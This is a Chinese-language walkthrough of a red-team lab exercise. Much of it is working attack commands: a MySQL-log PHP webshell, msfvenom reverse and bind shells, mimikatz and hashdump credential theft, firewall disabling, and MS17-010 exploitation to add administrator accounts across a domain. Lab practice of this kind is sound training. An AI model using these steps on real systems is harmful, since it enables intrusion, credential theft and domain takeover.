ATT&CK靶场练习记录-01

最近在参加一些靶场比赛,搭建了红日团队的靶场练习下,以下为记录。

kali攻击机 192.168.180.130
win7双网卡 192.168.180.129 NTE1(内网):192.168.52.143
win2003 192.168.52.141
win2008 192.168.52.138

拓扑图:

《ATT&CK靶场练习记录-01》

0X01 信息收集&WEBSHELL

python Perun.py -l . -t 192.168.180.129 --search all --skip-ping

mysql 弱口令 root root
《ATT&CK靶场练习记录-01》

思路(1):phpmyadmin写shell

1、phpmyadmin基于log日志写shell法

SHOW VARIABLES LIKE "%general%" 
查询当前mysql下log日志的默认地址,同时也看下log日志是否为开启状态,并且记录下原地址,方便后面恢复。
set global general_log = on;
开启日志监测,一般是关闭的,
set global general_log_file = "C:/phpStudy/WWW/mianhua.php";
这里设置我们需要写入的路径就可以了。
select "<?php @eval($_POST[mianhuage]);?>";
查询一个一句话,这个时候log日志里就会记录这个。
set global general_log = off;

关闭下日志记录。
蚁剑或菜刀可连接成功:

《ATT&CK靶场练习记录-01》

思路(2):xycms后台写shell

http://192.168.52.143/yxcms/index.php?r=admin/index/login
后台弱口令:admin 123456

《ATT&CK靶场练习记录-01》

写入一句话:

《ATT&CK靶场练习记录-01》
webshell: http://192.168.52.143/yxcms/index.php
《ATT&CK靶场练习记录-01》

0X02 windos提权生成msf shell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.180.130 LPORT=4444 -f exe > shell.exe

蚁剑上传后exe后直接目录下执行,上线后通过msf提权。

《ATT&CK靶场练习记录-01》
msf5 > use exploit/multi/hander 
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp 
msf5 exploit(multi/handler) > set lhost 192.168.180.130 
msf5 exploit(multi/handler) > set lport 4444 
msf5 exploit(multi/handler) > exploit -j

上线后依次执行提权即可。

《ATT&CK靶场练习记录-01》
MSF下打开3389: meterpreter > run post/windows/manage/enable_rdp 或shell下执行D0S命令:
MSF下加载mimikatz获取明文密码: meterpreter > load mimikatz meterpreter > kerberos
《ATT&CK靶场练习记录-01》

注意:netsh advfirewall set allprofiles state off 关闭win7防火墙

0X03 横向移动

meterpreter会话下键入以下命令可创建路由规则:
meterpreter > run autoroute -s 192.168.52.0/24 #添加路由 meterpreter > run autoroute -p #查看路由 meterpreter > run post/windows/gather/arp_scanner rhosts=192.168.52.0/24 # 使用类似arp_scanner的端口模块就能检测到的IP地址
《ATT&CK靶场练习记录-01》
扫描下主机SMB信息: 
use auxiliary/scanner/smb/smb_version 
set rhosts 192.168.52.0/24 
set threads 50 
run
《ATT&CK靶场练习记录-01》
挂Socks4a代理 代理nmap和其他工具对主机进行渗透 
use auxiliary/server/socks4a 
show options 
run
《ATT&CK靶场练习记录-01》
sudo proxychains nmap -sV -Pn -p 445 --script smb-vuln-ms17-010.nse 192.168.52.141 
可以成功访问到且存在ms17-010
《ATT&CK靶场练习记录-01》
{+] 192.168.52.141:445 - Host is running Windows 2003 (build:3790) (name:ROOT-TVI862UBEH) (domain:GOD) (signatures:optional) 
[+] 192.168.52.138:445 - Host is running Windows 2008 R2 Datacenter SP1 (build:7601) (name:OWA) (domain:GOD) (signatures:required) 
[+] 192.168.52.143:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:STU1) (domain:GOD) (signatures:optional) 192.168.52.141
通过MS17-010命令执行拿下windows2003(192.168.52.141),

use auxiliary/admin/smb/ms17_010_command 
set rhosts 192.168.52.141 
set command net user mianhua QAZwsx123 /add 
run #运行 
set command net localgroup administrators mianhua /add 
run #运行 
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f' 
#开启3389
《ATT&CK靶场练习记录-01》
proxychains rdesktop 192.168.52.141 -u mianhua -p QAZwsx123 #转发端口连接3389
《ATT&CK靶场练习记录-01》
MS17-010拿下域控制器(通过直接ms17-010未返回session):
sudo proxychains nmap -sV -Pn -p 445 --script smb-vuln-ms17-010.nse 192.168.52.138 
#存在17-010 
proxychains nmap -p 3389 -Pn -sT 192.168.52.138 
#检测3389是否打开
《ATT&CK靶场练习记录-01》
set rhosts 192.168.52.138 
set command netsh advfirewall set allprofiles state off
#关闭防火墙 
run 
#运行
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f' 
#打开3389 
run 
#运行
《ATT&CK靶场练习记录-01》
sudo proxychains rdesktop -u administrator -p QAZwsx123 192.168.52.138 
#开启了3389直接通过administrator即可登陆。(属于GOD.ORG域内) 此处有个坑直接打MS17-010可能会蓝屏重启无session返回
《ATT&CK靶场练习记录-01》
使用wmi进行操作上传wmi到192.168.52.143(win7)这个机器上去,然后执行:cscript.exe wmiexec.vbs /cmd 192.168.52.138 whoami
《ATT&CK靶场练习记录-01》
跨2级代理,windows2008正向回连攻击机: 
msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > 1shell.exe 
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > 1shell.exe

kali监听:

exploit/multi/handler 
set payload windows/x64/meterpreter/bind_tcp 
set rhost 192.168.52.138 
#上线靶机地址
《ATT&CK靶场练习记录-01》
加载获取hash 
run post/windows/gather/smart_hashdump
《ATT&CK靶场练习记录-01》

点赞